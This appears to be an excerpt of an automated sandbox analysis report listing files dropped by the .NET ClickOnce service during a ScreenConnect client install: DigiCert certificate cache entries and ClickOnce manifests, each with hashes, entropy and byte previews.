Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.1450363224900375
Encrypted:	false
SSDEEP:	6:kKn/lyN+SkQlPlEGYRMY9z+s3Ql2DUevat:P//kPlE99SCQl2DUevat
MD5:	7CEA87C9B95755B21BB011ED25246531
SHA1:	C4949819B1FBC39DE1C5FC768F87A6A29B3C8EFD
SHA-256:	8A90976718CBB4B1DD7D15D1F14F8C8CA6670D6FCF30CEA8011478DCC5221AB6
SHA-512:	C1C5562ADB08E469A2D32225A1EAEBEAE5F6466A27746AD98D9C0704B1F9EE71DC7ACD5B02285ADB1371BF16B9104B5446DC832162B252040446FF86854C61C1
Malicious:	false
Preview:	p...... ..........dbF...(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.1996973321424087
Encrypted:	false
SSDEEP:	3:kkFklvK1fllXlE/YXlzX/RDvcalXl+RAIdA31y+NW0y1YboOai2WelVJUTMVDXlN:kKHzNcalgRAOAUSW0P3PeXJUwh8lmi3Y
MD5:	E5F8AFAA122DDAADFC5283AD04CED104
SHA1:	3B9CAFFDD3007960388EFC97CE3AC376B3B5E441
SHA-256:	BC77AD6BF41AB2973B934FD4D26FDF5021F9D04D486732B0ABA997CF972A65F2
SHA-512:	A7759E183DB6F254502ED74F6AF477047301C8F7B291BCD7B615B095E3F046AC61F5991E7C5C193B37EF43816C2EF4CD63E66C68ACE14641C226ABBD4450142D
Malicious:	false
Preview:	p...... ................(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.9932408137521884
Encrypted:	false
SSDEEP:	6:kKglKtfVwBfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:YIUBmxMiv8sFBSfamB3rbFURMOlAkr
MD5:	822A2848890C6D6310BF77A6CA12D671
SHA1:	91E980961D5BD9BC2EA129609D4CB0044375491A
SHA-256:	A9BAF75F4B2CFCF40FC27DF23F1C267C4FA17F338EDAA2CDA6801D512641932D
SHA-512:	4FD7CAFBECC401AFF2F1783E0740472CE22DB0AC4E7CB5EEDD4B8DECEB78FE0E1DE8AB60B53B9A97C0D5D7A3D2EC4E217D9DE1D967694D560E151095FDDF6E9E
Malicious:	false
Preview:	p...... ....(....5..\|...(.................E#......)LV.....................)LV... ........I(\|.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.052898866971229
Encrypted:	false
SSDEEP:	6:kKmd4LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:ed4LYS4tWOxSW0PAMsZp
MD5:	77173AFB5742D883DB5585F795083096
SHA1:	53BCEF4BCEA04B3F52CF2C5A1D4924F82EE5D1C4
SHA-256:	212909675BFBD4637D4EDC1EFECB3783E0F126698BBDD5CDADD7CA047B85FF0D
SHA-512:	3CBAB850350C1A0DC43E95F9CBFE3A2BABE11B8F0F961F35579B6E83600771C664E13ADD94776E3F095296EDC9DAA0ECCDE6F785738C0C6AF153E01C8F0BA4F8
Malicious:	false
Preview:	p...... ....l.....f.n...(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.112612025357795
Encrypted:	false
SSDEEP:	384:Llq5xRGo26tX9DkX9R/QPIBM7Ysov9uVtlo/:Ls3T26tX9DkX9R/QPI+0sov9uVtly
MD5:	FA9581301B2D684ED539B07BCB40E415
SHA1:	5D20A670A81CA93F648783D10CB5079F980C0999
SHA-256:	1D83983912F007BB48A612EE441F402DC25A1347FFE1FCC0F1A27BA49F8425F5
SHA-512:	877242985BEE1AF72110C4EC8EE7233FDF560337AD6B505D0E5D4897F1CC652E3BE6927B205A42855CABCCE3C067ED25ED08E2182B2C129D1475426D59619F3F
Malicious:	false
Preview:	PcmH............e...f.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.341183992172915
Encrypted:	false
SSDEEP:	48:nIEfBeF7lWuWW+Lg0e6S+9owQX7g27mL438ciUcVM8Aw+t71hIYX:nJ3uWWWeV+WwQXlmL4MckVM8Aw+PhIYX
MD5:	DE31E889B74F8275DC8A7B71EC01E296
SHA1:	4F21A985EF674ECD9CB510DF94BC7ECE1EDF9E59
SHA-256:	A5F4DDCF94B95F35B09559B3099BACFA2DC90B0538528F2C0D901C766F400BC8
SHA-512:	772669317E59E11AF2C9DFC16D6E33587D8CD49F5A804DFAB1FA55C5100A796CA0CD5EF8D35398A8C0ABE06DE26E4F94B3239374A360A42A077F2188AF77AE86
Malicious:	false
Preview:	PcmH........"..B!.e.#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................L...............................................L...............................................L...............................................L...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5260
Entropy (8bit):	4.350612647556388
Encrypted:	false
SSDEEP:	96:+Nq6R84zeV+Ww7mk9O43jYHlIgBXZzMqy9niNqwnjIbm:KR840JC9tUHlXBXNXjd
MD5:	BA96FD537E22B4AA828DD6FF5F548EBF
SHA1:	7A073BD1B924A9131E37B89132E1723DA842021C
SHA-256:	6D49D13A69471C797537A1ACA1B79D5EAAF06D8013D6C5139B98F383A6CD6960
SHA-512:	F49DB33F8D9713E7101E4858C83CEAE96BD6664BA167B10E25FD83AC18189A07CFC9BAD90FD7442F32F16AB7661EBEC5CAA6DDCC2CF6C60D505DFD12754A8BC5
Malicious:	false
Preview:	PcmH.........5.s....4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......\|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................L...............................................L...............................................L...............................................L.......................

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6588
Entropy (8bit):	3.792709857681787
Encrypted:	false
SSDEEP:	96:2MmxseV+WwwU8WpbOr2WAvgoG6vqQoOoMVksJqi/D5:6xjJwpblaeqZw75
MD5:	8FBB88ED4F4B398C42910650940D0716
SHA1:	9EE9EFBE99F8825CA5D0CF4BEAC6637EBE675E67
SHA-256:	6A1EF1F874D102F3AA502F8C9F68DBE7E20AC6CD5BF0372D0AEC0B15B11E3049
SHA-512:	B0093DD09309FB366DD9D143D5F025BC3F15A7B11194A06E2DDE98BBACE37A1D7E6975F4AB6E5CF059090489296703D106A1B565878C616E6A899AE0E0A24ACC
Malicious:	false
Preview:	PcmH........vh.....@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...........................................................................L.......................

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.239204874262159
Encrypted:	false
SSDEEP:	48:7MQScAgIe6S+9oww7g47JO2V42WAXxnwbb:7XSckeV+WwwnJOr2WAXxnEb
MD5:	78CEBD9FA44EF7122CD3108F48A6A586
SHA1:	56701C296EE6AEA6BD413105406153395B6371A0
SHA-256:	193033ABC884026D048A367145EF32BBF813FCF8FEB5D923BEBE0A64E67A50BA
SHA-512:	CFBC2FF69C81F250AC5981172146010AEF7980D4CBE33E90532F9E35ABA74DC8B5001789B5CC7BFDEEECB7F488592C483D6DCC087D261FFED09ABABD7E06DAB7
Malicious:	false
Preview:	PcmH.........j..Y.].............T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................L...............................................L...............................................L...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ..."............... urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14612
Entropy (8bit):	5.714851166055231
Encrypted:	false
SSDEEP:	192:FWh4+hn9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:FW19qS6VTX9dX9R/QPIBM7YDb
MD5:	B24F068A06466EF27ED1412D3EDEB944
SHA1:	38279F0C7BF9730F4FC35D5A0E5A73D1A57AF297
SHA-256:	B446E47371197D691F0DD3D2B8949CE083BD470DD24F9CF473C50BDC2193A3F5
SHA-512:	CEC486740DD84AA353C0C7A69EC6CBA97FCE395BF607E66165398CBCE14A58608323994488CD54DF09D5C2B21E330527AC45B2B1AFD58D6AD6DEEFB3E3234D30
Malicious:	false
Preview:	PcmH........Y......$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...\|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om................-........................E..................................L...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	117980
Entropy (8bit):	5.585720273564656
Encrypted:	false
SSDEEP:	3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
MD5:	4E152D84C20AB6330FF0CF47A9AF7C6D
SHA1:	018F32D833124056FCCFC200318542687D0E5565
SHA-256:	5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
SHA-512:	2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

